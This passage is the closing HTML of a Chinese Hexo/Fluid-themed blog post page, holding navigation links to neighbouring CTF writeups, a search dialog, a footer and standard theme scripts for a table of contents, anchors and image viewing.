                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/09/20/usb_forensics/" title="USB流量数据包的取证初探以及CTF中的解题应用">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">USB流量数据包的取证初探以及CTF中的解题应用</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/03/30/wctf2020_official_wp/" title="WUST-CTF 2020 官方 Writeup">
                        <span class="hidden-mobile">WUST-CTF 2020 官方 Writeup</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
